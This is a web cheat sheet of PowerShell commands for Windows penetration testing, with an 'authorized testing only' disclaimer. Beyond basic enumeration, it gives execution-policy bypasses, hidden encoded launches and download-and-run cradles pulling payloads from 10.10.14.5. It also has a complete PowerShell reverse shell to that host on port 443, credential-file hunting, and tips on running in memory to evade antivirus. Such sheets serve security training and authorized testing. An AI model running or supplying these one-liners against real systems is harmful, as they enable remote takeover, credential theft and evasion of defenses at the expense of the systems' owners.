PowerShell Cheat Sheet

PowerShell commands for Windows enumeration, download/execution, and offensive one-liners during authorized engagements.

Utilities & Shellsautomationpost-exploitationpowershellscriptingwindowsUpdated 2026-06-17

Overview

PowerShell is the default automation and post-exploitation language on Windows. This sheet covers the essentials plus the offensive one-liners you actually use on an engagement: enumeration, file transfer, execution-policy bypasses, and in-memory download-and-run. Prefer built-in cmdlets—they blend into normal admin activity.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Basics & help

Discover cmdlets by keyword

Get-Command *service*

Help with usage examples

Get-Help Get-Process -Examples

Inspect an object's properties/methods

Get-Process | Get-Member

Filter and select (the pipeline core)

Get-Process | Where-Object {$_.CPU -gt 100} | Select-Object Name,CPU

System & user enumeration

Current user, groups, privileges

whoami /all

Local users and admins

Get-LocalUser; Get-LocalGroupMember Administrators

IPs and listening ports

Get-NetIPAddress; Get-NetTCPConnection -State Listen

Installed software

Get-CimInstance Win32_Product | Select Name,Version

Hunt interesting files

Get-ChildItem -Path C:\ -Recurse -Include *.kdbx,*.config,*.xml -ErrorAction SilentlyContinue

Execution policy & bypass

Run a script bypassing execution policy

powershell -ep bypass -f script.ps1

No-profile, hidden window, base64 command

powershell -nop -w hidden -enc <base64>

Bypass for the current session only

Set-ExecutionPolicy -Scope Process Bypass

Download & execute

Download a file (Invoke-WebRequest)

iwr http://10.10.14.5/nc.exe -OutFile C:\Windows\Temp\nc.exe

Download and run a script in memory (no disk)

IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.5/p.ps1')

Modern download-cradle variant

Invoke-RestMethod http://10.10.14.5/x.ps1 | iex

LOLBIN download (non-PowerShell fallback)

certutil -urlcache -split -f http://10.10.14.5/f.exe f.exe

Quick one-liners

PowerShell reverse shell

$c=New-Object Net.Sockets.TCPClient('10.10.14.5',443);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$sb=([text.encoding]::ASCII).GetBytes($r);$s.Write($sb,0,$sb.Length);$s.Flush()}

Base64-encode a command for -enc

[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('whoami'))

Decode a base64 PowerShell command

[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('<b64>'))

Run as another user with stored creds

$p=ConvertTo-SecureString 'Pass' -AsPlainText -Force;$cr=New-Object Management.Automation.PSCredential('corp\admin',$p);Start-Process cmd -Credential $cr

Recursively search files for a string

Get-ChildItem -Recurse | Select-String -Pattern 'password'

Tips

-nop -w hidden -enc is the classic stealth combo: no profile, hidden window, encoded command.
Prefer IEX download-cradles for in-memory execution to avoid touching disk and AV.
AMSI and Constrained Language Mode will block many payloads on hardened hosts — enumerate $ExecutionContext.SessionState.LanguageMode.
Get-Member is your best friend — it shows what you can do with any object in the pipeline.